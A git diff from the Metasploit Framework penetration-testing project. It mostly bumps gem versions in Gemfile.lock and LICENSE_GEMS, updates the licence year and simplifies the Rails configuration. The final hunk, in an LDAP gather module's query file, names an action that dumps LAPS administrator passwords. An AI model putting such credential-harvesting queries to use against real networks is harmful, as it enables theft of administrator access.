+ csv (3.3.2)
daemons (1.4.1)
date (3.4.1)
debug (1.8.0)
irb (>= 1.5.0)
reline (>= 0.3.1)
- diff-lcs (1.5.1)
- dnsruby (1.72.2)
+ diff-lcs (1.6.0)
+ dnsruby (1.72.4)
+ base64 (~> 0.2.0)
+ logger (~> 1.6.5)
simpleidn (~> 0.2.1)
docile (1.4.1)
domain_name (0.6.20240107)
- drb (2.2.1)
+ drb (2.2.3)
ed25519 (1.3.0)
elftools (1.3.1)
bindata (~> 2)
@@ -227,10 +246,11 @@ GEM
em-socksify (0.3.3)
base64
eventmachine (>= 1.0.0.beta.4)
- erubi (1.13.0)
+ erb (5.0.2)
+ erubi (1.13.1)
eventmachine (1.2.7)
- factory_bot (6.5.0)
- activesupport (>= 5.0.0)
+ factory_bot (6.5.1)
+ activesupport (>= 6.1.0)
factory_bot_rails (6.4.4)
factory_bot (~> 6.5)
railties (>= 5.0.0)
@@ -250,6 +270,7 @@ GEM
fiddle (1.1.6)
filesize (0.2.0)
fivemat (1.3.7)
+ forwardable (1.3.3)
getoptlong (0.2.1)
gssapi (1.3.1)
ffi (>= 1.0.1)
@@ -261,78 +282,101 @@ GEM
hrr_rb_ssh-ed25519 (0.4.2)
ed25519 (~> 1.2)
hrr_rb_ssh (>= 0.4)
- http-cookie (1.0.7)
+ http-cookie (1.0.8)
domain_name (~> 0.5)
http_parser.rb (0.8.0)
- httpclient (2.8.3)
- i18n (1.14.6)
+ httpclient (2.9.0)
+ mutex_m
+ i18n (1.14.7)
concurrent-ruby (~> 1.0)
- io-console (0.7.2)
- irb (1.7.4)
- reline (>= 0.3.6)
+ io-console (0.8.1)
+ ipaddr (1.2.7)
+ irb (1.15.2)
+ pp (>= 0.6.0)
+ rdoc (>= 4.0.0)
+ reline (>= 0.4.2)
jmespath (1.6.2)
jsobfu (0.4.2)
rkelly-remix
- json (2.7.5)
- language_server-protocol (3.17.0.3)
+ json (2.10.2)
+ language_server-protocol (3.17.0.5)
+ license_finder (5.11.1)
+ bundler
+ rubyzip (>= 1, < 3)
+ thor
+ toml (= 0.2.0)
+ with_env (= 1.1.0)
+ xml-simple
+ lint_roller (1.1.0)
little-plugger (1.1.4)
- logger (1.6.1)
+ logger (1.6.6)
logging (2.4.0)
little-plugger (~> 1.1)
multi_json (~> 1.14)
- loofah (2.23.1)
+ loofah (2.24.1)
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
- macaddr (1.7.2)
- systemu (~> 2.6.5)
+ lru_redux (1.1.0)
memory_profiler (1.1.0)
metasm (1.0.5)
- metasploit-concern (5.0.3)
+ metasploit-concern (5.0.5)
activemodel (~> 7.0)
activesupport (~> 7.0)
+ drb
+ mutex_m
railties (~> 7.0)
zeitwerk
- metasploit-credential (6.0.11)
+ metasploit-credential (6.0.16)
+ bigdecimal
+ csv
+ drb
metasploit-concern
metasploit-model
metasploit_data_models (>= 5.0.0)
+ mutex_m
net-ssh
pg
railties
rex-socket
rubyntlm
rubyzip
- metasploit-model (5.0.2)
+ metasploit-model (5.0.4)
activemodel (~> 7.0)
activesupport (~> 7.0)
+ bigdecimal
+ drb
+ mutex_m
railties (~> 7.0)
- metasploit-payloads (2.0.189)
- metasploit_data_models (6.0.6)
+ metasploit-payloads (2.0.221)
+ metasploit_data_models (6.0.10)
activerecord (~> 7.0)
activesupport (~> 7.0)
arel-helpers
+ bigdecimal
+ drb
metasploit-concern
metasploit-model (>= 3.1)
+ mutex_m
pg
railties (~> 7.0)
recog
webrick
- metasploit_payloads-mettle (1.0.35)
+ metasploit_payloads-mettle (1.0.42)
method_source (1.1.0)
mime-types (3.6.0)
logger
mime-types-data (~> 3.2015)
- mime-types-data (3.2024.1001)
- mini_portile2 (2.8.8)
- minitest (5.25.1)
+ mime-types-data (3.2025.0304)
+ mini_portile2 (2.8.9)
+ minitest (5.25.5)
mqtt (0.6.0)
msgpack (1.6.1)
multi_json (1.15.0)
mustermann (3.0.3)
ruby2_keywords (~> 0.0.1)
- mutex_m (0.2.0)
+ mutex_m (0.3.0)
nessus_rest (0.1.6)
- net-imap (0.5.0)
+ net-imap (0.5.6)
date
net-protocol
net-ldap (0.19.0)
@@ -340,13 +384,13 @@ GEM
timeout
net-sftp (4.0.0)
net-ssh (>= 5.0.0, < 8.0.0)
- net-smtp (0.5.0)
+ net-smtp (0.5.1)
net-protocol
net-ssh (7.3.0)
network_interface (0.0.4)
nexpose (7.3.0)
nio4r (2.7.4)
- nokogiri (1.18.2)
+ nokogiri (1.18.8)
mini_portile2 (~> 2.8.2)
racc (~> 1.4)
nori (2.7.1)
@@ -360,117 +404,140 @@ GEM
ostruct (0.6.1)
packetfu (2.0.0)
pcaprub (~> 0.13.1)
- parallel (1.26.3)
- parser (3.3.5.0)
+ parallel (1.27.0)
+ parser (3.3.8.0)
ast (~> 2.4.1)
racc
+ parslet (1.8.2)
patch_finder (1.0.2)
pcaprub (0.13.3)
- pdf-reader (2.12.0)
- Ascii85 (~> 1.0)
+ pdf-reader (2.14.1)
+ Ascii85 (>= 1.0, < 3.0, != 2.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (1.5.9)
+ pp (0.6.2)
+ prettyprint
+ prettyprint (0.2.0)
+ prism (1.4.0)
pry (0.14.2)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
+ psych (5.2.6)
+ date
+ stringio
public_suffix (6.0.1)
- puma (6.4.3)
+ puma (6.6.0)
nio4r (~> 2.0)
racc (1.8.1)
- rack (2.2.10)
+ rack (2.2.17)
rack-protection (3.2.0)
base64 (>= 0.1.0)
rack (~> 2.2, >= 2.2.4)
- rack-test (2.1.0)
+ rack-session (1.0.2)
+ rack (< 3)
+ rack-test (2.2.0)
rack (>= 1.3)
- rails-dom-testing (2.2.0)
+ rackup (1.0.1)
+ rack (< 3)
+ webrick
+ rails-dom-testing (2.3.0)
activesupport (>= 5.0.0)
minitest
nokogiri (>= 1.6)
- rails-html-sanitizer (1.6.0)
+ rails-html-sanitizer (1.6.2)
loofah (~> 2.21)
- nokogiri (~> 1.14)
- railties (7.0.8.6)
- actionpack (= 7.0.8.6)
- activesupport (= 7.0.8.6)
- method_source
+ nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
+ railties (7.1.5.1)
+ actionpack (= 7.1.5.1)
+ activesupport (= 7.1.5.1)
+ irb
+ rackup (>= 1.0.0)
rake (>= 12.2)
- thor (~> 1.0)
- zeitwerk (~> 2.5)
+ thor (~> 1.0, >= 1.2.2)
+ zeitwerk (~> 2.6)
rainbow (3.1.1)
- rake (13.2.1)
- rasn1 (0.13.0)
+ rake (13.3.0)
+ rasn1 (0.14.0)
strptime (~> 0.2.5)
rb-readline (0.5.5)
- recog (3.1.11)
+ rdoc (6.14.2)
+ erb
+ psych (>= 4.0.0)
+ recog (3.1.17)
nokogiri
- redcarpet (3.6.0)
- regexp_parser (2.9.2)
- reline (0.5.10)
+ redcarpet (3.6.1)
+ regexp_parser (2.10.0)
+ reline (0.6.1)
io-console (~> 0.5)
require_all (3.0.0)
- rex-arch (0.1.16)
+ rex-arch (0.1.18)
rex-text
- rex-bin_tools (0.1.9)
+ rex-bin_tools (0.1.10)
metasm
rex-arch
rex-core
rex-struct2
rex-text
- rex-core (0.1.32)
- rex-encoder (0.1.7)
+ rex-core (0.1.34)
+ rex-encoder (0.1.8)
metasm
rex-arch
rex-text
- rex-exploitation (0.1.40)
+ rex-exploitation (0.1.41)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rexml
- rex-java (0.1.7)
- rex-mime (0.1.8)
+ rex-java (0.1.8)
+ rex-mime (0.1.11)
rex-text
- rex-nop (0.1.3)
+ rex-nop (0.1.4)
rex-arch
- rex-ole (0.1.8)
+ rex-ole (0.1.9)
rex-text
- rex-powershell (0.1.100)
+ rex-powershell (0.1.101)
rex-random_identifier
rex-text
ruby-rc4
- rex-random_identifier (0.1.13)
+ rex-random_identifier (0.1.16)
+ bigdecimal
rex-text
- rex-registry (0.1.5)
- rex-rop_builder (0.1.5)
+ rex-registry (0.1.6)
+ rex-rop_builder (0.1.6)
metasm
rex-core
rex-text
- rex-socket (0.1.58)
+ rex-socket (0.1.63)
dnsruby
rex-core
- rex-sslscan (0.1.10)
+ rex-sslscan (0.1.13)
rex-core
rex-socket
rex-text
- rex-struct2 (0.1.4)
- rex-text (0.2.59)
- rex-zip (0.1.5)
+ rex-struct2 (0.1.5)
+ rex-text (0.2.61)
+ bigdecimal
+ rex-zip (0.1.6)
rex-text
- rexml (3.3.9)
+ rexml (3.4.1)
+ rinda (0.2.0)
+ drb
+ forwardable
+ ipaddr
rkelly-remix (0.0.7)
rspec (3.13.0)
rspec-core (~> 3.13.0)
rspec-expectations (~> 3.13.0)
rspec-mocks (~> 3.13.0)
- rspec-core (3.13.2)
+ rspec-core (3.13.3)
rspec-support (~> 3.13.0)
rspec-expectations (3.13.3)
diff-lcs (>= 1.2.0, < 2.0)
@@ -478,7 +545,7 @@ GEM
rspec-mocks (3.13.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
- rspec-rails (7.0.1)
+ rspec-rails (7.1.1)
actionpack (>= 7.0)
activesupport (>= 7.0)
railties (>= 7.0)
@@ -488,26 +555,28 @@ GEM
rspec-support (~> 3.13)
rspec-rerun (1.1.0)
rspec (~> 3.0)
- rspec-support (3.13.1)
- rubocop (1.67.0)
+ rspec-support (3.13.2)
+ rubocop (1.75.7)
json (~> 2.3)
- language_server-protocol (>= 3.17.0)
+ language_server-protocol (~> 3.17.0.2)
+ lint_roller (~> 1.1.0)
parallel (~> 1.10)
parser (>= 3.3.0.2)
rainbow (>= 2.2.2, < 4.0)
- regexp_parser (>= 2.4, < 3.0)
- rubocop-ast (>= 1.32.2, < 2.0)
+ regexp_parser (>= 2.9.3, < 3.0)
+ rubocop-ast (>= 1.44.0, < 2.0)
ruby-progressbar (~> 1.7)
- unicode-display_width (>= 2.4.0, < 3.0)
- rubocop-ast (1.33.0)
- parser (>= 3.3.1.0)
+ unicode-display_width (>= 2.4.0, < 4.0)
+ rubocop-ast (1.44.1)
+ parser (>= 3.3.7.2)
+ prism (~> 1.4)
ruby-macho (4.1.0)
- ruby-mysql (4.1.0)
- ruby-prof (1.4.2)
+ ruby-mysql (4.2.0)
+ ruby-prof (1.7.1)
ruby-progressbar (1.13.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
- ruby_smb (3.3.13)
+ ruby_smb (3.3.15)
bindata (= 2.4.15)
openssl-ccm
openssl-cmac
@@ -515,10 +584,11 @@ GEM
windows_error (>= 0.1.4)
rubyntlm (0.6.5)
base64
- rubyzip (2.3.2)
+ rubyzip (2.4.1)
sawyer (0.9.2)
addressable (>= 2.3.5)
faraday (>= 0.17.3, < 3)
+ securerandom (0.4.1)
simplecov (0.18.2)
docile (~> 1.1)
simplecov-html (~> 0.11)
@@ -532,32 +602,37 @@ GEM
sqlite3 (1.7.3)
mini_portile2 (~> 2.8.0)
sshkey (3.0.0)
+ stringio (3.1.1)
strptime (0.2.5)
swagger-blocks (3.0.0)
- systemu (2.6.5)
- test-prof (1.4.2)
+ syslog (0.3.0)
+ logger
+ test-prof (1.4.4)
thin (1.8.2)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.3.2)
- tilt (2.4.0)
+ tilt (2.6.0)
timecop (0.9.10)
- timeout (0.4.1)
+ timeout (0.4.3)
+ toml (0.2.0)
+ parslet (~> 1.8.0)
ttfunk (1.8.0)
bigdecimal (~> 3.1)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
- tzinfo-data (1.2024.2)
+ tzinfo-data (1.2025.1)
tzinfo (>= 1.0.0)
- unicode-display_width (2.6.0)
+ unicode-display_width (3.1.4)
+ unicode-emoji (~> 4.0, >= 4.0.4)
+ unicode-emoji (4.0.4)
unix-crypt (1.3.1)
- uuid (2.3.9)
- macaddr (~> 1.0)
warden (1.2.9)
rack (>= 2.0.9)
- webrick (1.8.2)
- websocket-driver (0.7.6)
+ webrick (1.9.1)
+ websocket-driver (0.7.7)
+ base64
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
win32api (0.1.0)
@@ -572,13 +647,16 @@ GEM
nori (~> 2.0, >= 2.7.1)
rexml (~> 3.0)
rubyntlm (~> 0.6.0, >= 0.6.3)
+ with_env (1.1.0)
xdr (3.0.3)
activemodel (>= 4.2, < 8.0)
activesupport (>= 4.2, < 8.0)
+ xml-simple (1.1.9)
+ rexml
xmlrpc (0.3.3)
webrick
yard (0.9.37)
- zeitwerk (2.6.18)
+ zeitwerk (2.7.3)
PLATFORMS
ruby
@@ -588,6 +666,7 @@ DEPENDENCIES
debug (>= 1.0.0)
factory_bot_rails
fivemat
+ license_finder (= 5.11.1)
memory_profiler
metasploit-framework!
octokit
@@ -596,12 +675,12 @@ DEPENDENCIES
redcarpet
rspec-rails
rspec-rerun
- rubocop
- ruby-prof (= 1.4.2)
+ rubocop (= 1.75.7)
+ ruby-prof
simplecov (= 0.18.2)
test-prof
timecop
yard
BUNDLED WITH
- 2.5.10
+ 2.5.22
diff --git a/LICENSE b/LICENSE
index 9798b913ca52e..3490894e5e2f0 100644
--- a/LICENSE
+++ b/LICENSE
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: https://www.metasploit.com/
Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2025, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Framework is provided under the 3-clause BSD license provided
diff --git a/LICENSE_GEMS b/LICENSE_GEMS
index 35357f3c92835..bc610eace8c9e 100644
--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -1,60 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.1, MIT
+Ascii85, 2.0.1, MIT
aarch64, 2.1.0, "Apache 2.0"
abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.6, MIT
-actionview, 7.0.8.6, MIT
-activemodel, 7.0.8.6, MIT
-activerecord, 7.0.8.6, MIT
-activesupport, 7.0.8.6, MIT
+actionpack, 7.1.5.1, MIT
+actionview, 7.1.5.1, MIT
+activemodel, 7.1.5.1, MIT
+activerecord, 7.1.5.1, MIT
+activesupport, 7.1.5.1, MIT
addressable, 2.8.7, "Apache 2.0"
afm, 0.2.2, MIT
-allure-rspec, 2.24.5, "Apache 2.0"
-allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.15.0, MIT
-ast, 2.4.2, MIT
-aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.999.0, "Apache 2.0"
-aws-sdk-core, 3.211.0, "Apache 2.0"
-aws-sdk-ec2, 1.486.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
-aws-sdk-iam, 1.112.0, "Apache 2.0"
-aws-sdk-kms, 1.95.0, "Apache 2.0"
-aws-sdk-s3, 1.169.0, "Apache 2.0"
-aws-sdk-ssm, 1.183.0, "Apache 2.0"
-aws-sigv4, 1.10.1, "Apache 2.0"
+allure-rspec, 2.26.0, "Apache 2.0"
+allure-ruby-commons, 2.26.0, "Apache 2.0"
+arel-helpers, 2.16.0, MIT
+ast, 2.4.3, MIT
+aws-eventstream, 1.3.2, "Apache 2.0"
+aws-partitions, 1.1065.0, "Apache 2.0"
+aws-sdk-core, 3.220.1, "Apache 2.0"
+aws-sdk-ec2, 1.511.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.55.0, "Apache 2.0"
+aws-sdk-iam, 1.119.0, "Apache 2.0"
+aws-sdk-kms, 1.99.0, "Apache 2.0"
+aws-sdk-s3, 1.182.0, "Apache 2.0"
+aws-sdk-ssm, 1.191.0, "Apache 2.0"
+aws-sigv4, 1.11.0, "Apache 2.0"
base64, 0.2.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
-benchmark, 0.4.0, "ruby, Simplified BSD"
-bigdecimal, 3.1.8, "ruby, Simplified BSD"
+benchmark, 0.4.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.2, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.18.4, MIT
-bson, 5.0.1, "Apache 2.0"
+bson, 5.0.2, "Apache 2.0"
builder, 3.3.0, MIT
-bundler, 2.5.10, MIT
+bundler, 2.5.22, MIT
byebug, 11.1.3, "Simplified BSD"
chunky_png, 1.4.0, MIT
coderay, 1.1.3, MIT
concurrent-ruby, 1.3.4, MIT
+connection_pool, 2.5.3, MIT
cookiejar, 0.3.4, "Simplified BSD"
crass, 1.0.6, MIT
-csv, 3.3.0, "ruby, Simplified BSD"
+csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
date, 3.4.1, "ruby, Simplified BSD"
debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.2, "Apache 2.0"
+diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.72.4, "Apache 2.0"
docile, 1.4.1, MIT
domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.1, "ruby, Simplified BSD"
+drb, 2.2.3, "ruby, Simplified BSD"
ed25519, 1.3.0, MIT
elftools, 1.3.1, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.3, MIT
-erubi, 1.13.0, MIT
+erb, 5.0.2, "ruby, Simplified BSD"
+erubi, 1.13.1, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.0, MIT
+factory_bot, 6.5.1, MIT
factory_bot_rails, 6.4.4, MIT
faker, 3.5.1, MIT
faraday, 2.7.11, MIT
@@ -65,57 +67,61 @@ ffi, 1.16.3, "New BSD"
fiddle, 1.1.6, "ruby, Simplified BSD"
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
+forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.7, MIT
+http-cookie, 1.0.8, MIT
http_parser.rb, 0.8.0, MIT
-httpclient, 2.8.3, ruby
-i18n, 1.14.6, MIT
-io-console, 0.7.2, "ruby, Simplified BSD"
-irb, 1.7.4, "ruby, Simplified BSD"
+httpclient, 2.9.0, ruby
+i18n, 1.14.7, MIT
+io-console, 0.8.1, "ruby, Simplified BSD"
+ipaddr, 1.2.7, "ruby, Simplified BSD"
+irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
-json, 2.7.5, ruby
-language_server-protocol, 3.17.0.3, MIT
+json, 2.10.2, ruby
+language_server-protocol, 3.17.0.5, MIT
+license_finder, 5.11.1, MIT
+lint_roller, 1.1.0, MIT
little-plugger, 1.1.4, MIT
-logger, 1.6.1, "ruby, Simplified BSD"
+logger, 1.6.6, "ruby, Simplified BSD"
logging, 2.4.0, MIT
-loofah, 2.23.1, MIT
-macaddr, 1.7.2, ruby
+loofah, 2.24.1, MIT
+lru_redux, 1.1.0, MIT
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.3, "New BSD"
-metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.52, "New BSD"
-metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.6, "New BSD"
-metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
+metasploit-concern, 5.0.5, "New BSD"
+metasploit-credential, 6.0.16, "New BSD"
+metasploit-framework, 6.4.76, "New BSD"
+metasploit-model, 5.0.4, "New BSD"
+metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.10, "New BSD"
+metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.6.0, MIT
-mime-types-data, 3.2024.1001, MIT
-mini_portile2, 2.8.8, MIT
-minitest, 5.25.1, MIT
+mime-types-data, 3.2025.0304, MIT
+mini_portile2, 2.8.9, MIT
+minitest, 5.25.5, MIT
mqtt, 0.6.0, MIT
msgpack, 1.6.1, "Apache 2.0"
multi_json, 1.15.0, MIT
mustermann, 3.0.3, MIT
-mutex_m, 0.2.0, "ruby, Simplified BSD"
+mutex_m, 0.3.0, "ruby, Simplified BSD"
nessus_rest, 0.1.6, MIT
-net-imap, 0.5.0, "ruby, Simplified BSD"
+net-imap, 0.5.6, "ruby, Simplified BSD"
net-ldap, 0.19.0, MIT
net-protocol, 0.2.2, "ruby, Simplified BSD"
net-sftp, 4.0.0, MIT
-net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-smtp, 0.5.1, "ruby, Simplified BSD"
net-ssh, 7.3.0, MIT
network_interface, 0.0.4, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.2, MIT
+nokogiri, 1.18.8, MIT
nori, 2.7.1, MIT
octokit, 4.25.1, MIT
openssl-ccm, 1.2.3, MIT
@@ -123,100 +129,114 @@ openssl-cmac, 2.0.2, MIT
openvas-omp, 0.0.4, MIT
ostruct, 0.6.1, "ruby, Simplified BSD"
packetfu, 2.0.0, "New BSD"
-parallel, 1.26.3, MIT
-parser, 3.3.5.0, MIT
+parallel, 1.27.0, MIT
+parser, 3.3.8.0, MIT
+parslet, 1.8.2, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.3, LGPL-2.1
-pdf-reader, 2.12.0, MIT
+pdf-reader, 2.14.1, MIT
pg, 1.5.9, "Simplified BSD"
+pp, 0.6.2, "ruby, Simplified BSD"
+prettyprint, 0.2.0, "ruby, Simplified BSD"
+prism, 1.4.0, MIT
pry, 0.14.2, MIT
pry-byebug, 3.10.1, MIT
+psych, 5.2.6, MIT
public_suffix, 6.0.1, MIT
-puma, 6.4.3, "New BSD"
+puma, 6.6.0, "New BSD"
racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.10, MIT
+rack, 2.2.17, MIT
rack-protection, 3.2.0, MIT
-rack-test, 2.1.0, MIT
-rails-dom-testing, 2.2.0, MIT
-rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.6, MIT
+rack-session, 1.0.2, MIT
+rack-test, 2.2.0, MIT
+rackup, 1.0.1, MIT
+rails-dom-testing, 2.3.0, MIT
+rails-html-sanitizer, 1.6.2, MIT
+railties, 7.1.5.1, MIT
rainbow, 3.1.1, MIT
-rake, 13.2.1, MIT
-rasn1, 0.13.0, MIT
+rake, 13.3.0, MIT
+rasn1, 0.14.0, MIT
rb-readline, 0.5.5, BSD
-recog, 3.1.11, unknown
-redcarpet, 3.6.0, MIT
-regexp_parser, 2.9.2, MIT
-reline, 0.5.10, ruby
+rdoc, 6.14.2, ruby
+recog, 3.1.17, unknown
+redcarpet, 3.6.1, MIT
+regexp_parser, 2.10.0, MIT
+reline, 0.6.1, ruby
require_all, 3.0.0, MIT
-rex-arch, 0.1.16, "New BSD"
-rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.32, "New BSD"
-rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.40, "New BSD"
-rex-java, 0.1.7, "New BSD"
-rex-mime, 0.1.8, "New BSD"
-rex-nop, 0.1.3, "New BSD"
-rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.100, "New BSD"
-rex-random_identifier, 0.1.13, "New BSD"
-rex-registry, 0.1.5, "New BSD"
-rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.58, "New BSD"
-rex-sslscan, 0.1.10, "New BSD"
-rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.59, "New BSD"
-rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.9, "Simplified BSD"
+rex-arch, 0.1.18, "New BSD"
+rex-bin_tools, 0.1.10, "New BSD"
+rex-core, 0.1.34, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
+rex-exploitation, 0.1.41, "New BSD"
+rex-java, 0.1.8, "New BSD"
+rex-mime, 0.1.11, "New BSD"
+rex-nop, 0.1.4, "New BSD"
+rex-ole, 0.1.9, "New BSD"
+rex-powershell, 0.1.101, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
+rex-registry, 0.1.6, "New BSD"
+rex-rop_builder, 0.1.6, "New BSD"
+rex-socket, 0.1.63, "New BSD"
+rex-sslscan, 0.1.13, "New BSD"
+rex-struct2, 0.1.5, "New BSD"
+rex-text, 0.2.61, "New BSD"
+rex-zip, 0.1.6, "New BSD"
+rexml, 3.4.1, "Simplified BSD"
+rinda, 0.2.0, "ruby, Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.13.0, MIT
-rspec-core, 3.13.2, MIT
+rspec-core, 3.13.3, MIT
rspec-expectations, 3.13.3, MIT
rspec-mocks, 3.13.2, MIT
-rspec-rails, 7.0.1, MIT
+rspec-rails, 7.1.1, MIT
rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.1, MIT
-rubocop, 1.67.0, MIT
-rubocop-ast, 1.33.0, MIT
+rspec-support, 3.13.2, MIT
+rubocop, 1.75.7, MIT
+rubocop-ast, 1.44.1, MIT
ruby-macho, 4.1.0, MIT
-ruby-mysql, 4.1.0, MIT
-ruby-prof, 1.4.2, "Simplified BSD"
+ruby-mysql, 4.2.0, MIT
+ruby-prof, 1.7.1, "Simplified BSD"
ruby-progressbar, 1.13.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.13, "New BSD"
+ruby_smb, 3.3.15, "New BSD"
rubyntlm, 0.6.5, MIT
-rubyzip, 2.3.2, "Simplified BSD"
+rubyzip, 2.4.1, "Simplified BSD"
sawyer, 0.9.2, MIT
+securerandom, 0.4.1, "ruby, Simplified BSD"
simplecov, 0.18.2, MIT
simplecov-html, 0.13.1, MIT
simpleidn, 0.2.3, MIT
sinatra, 3.2.0, MIT
sqlite3, 1.7.3, "New BSD"
sshkey, 3.0.0, MIT
+stringio, 3.1.1, "ruby, Simplified BSD"
strptime, 0.2.5, "Simplified BSD"
swagger-blocks, 3.0.0, MIT
-systemu, 2.6.5, ruby
-test-prof, 1.4.2, MIT
+syslog, 0.3.0, "ruby, Simplified BSD"
+test-prof, 1.4.4, MIT
thin, 1.8.2, "GPL-2.0+, ruby"
thor, 1.3.2, MIT
-tilt, 2.4.0, MIT
+tilt, 2.6.0, MIT
timecop, 0.9.10, MIT
-timeout, 0.4.1, "ruby, Simplified BSD"
+timeout, 0.4.3, "ruby, Simplified BSD"
+toml, 0.2.0, MIT
ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.2, MIT
-unicode-display_width, 2.6.0, MIT
+tzinfo-data, 1.2025.1, MIT
+unicode-display_width, 3.1.4, MIT
+unicode-emoji, 4.0.4, MIT
unix-crypt, 1.3.1, 0BSD
-uuid, 2.3.9, MIT
warden, 1.2.9, MIT
-webrick, 1.8.2, "ruby, Simplified BSD"
-websocket-driver, 0.7.6, "Apache 2.0"
+webrick, 1.9.1, "ruby, Simplified BSD"
+websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
win32api, 0.1.0, unknown
windows_error, 0.1.5, BSD
winrm, 2.3.9, "Apache 2.0"
+with_env, 1.1.0, MIT
xdr, 3.0.3, "Apache 2.0"
+xml-simple, 1.1.9, MIT
xmlrpc, 0.3.3, "ruby, Simplified BSD"
yard, 0.9.37, MIT
-zeitwerk, 2.6.18, MIT
+zeitwerk, 2.7.3, MIT
diff --git a/config/application.rb b/config/application.rb
index bda8166b912e7..2140840327ec6 100644
--- a/config/application.rb
+++ b/config/application.rb
@@ -41,18 +41,9 @@ class Application < Rails::Application
config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
config.autoloader = :zeitwerk
- case Rails.env
- when "development"
- config.eager_load = false
- when "test"
- config.eager_load = false
- when "production"
- config.eager_load = false
- end
-
- if ActiveRecord.respond_to?(:legacy_connection_handling=)
- ActiveRecord.legacy_connection_handling = false
- end
+ config.load_defaults 7.1
+
+ config.eager_load = false
end
end
end
diff --git a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
index 94c0595178026..6d3e9d7c724fe 100644
--- a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
+++ b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
@@ -249,7 +249,7 @@ queries:
- https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
- action: ENUM_LAPS_PASSWORDS
- description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
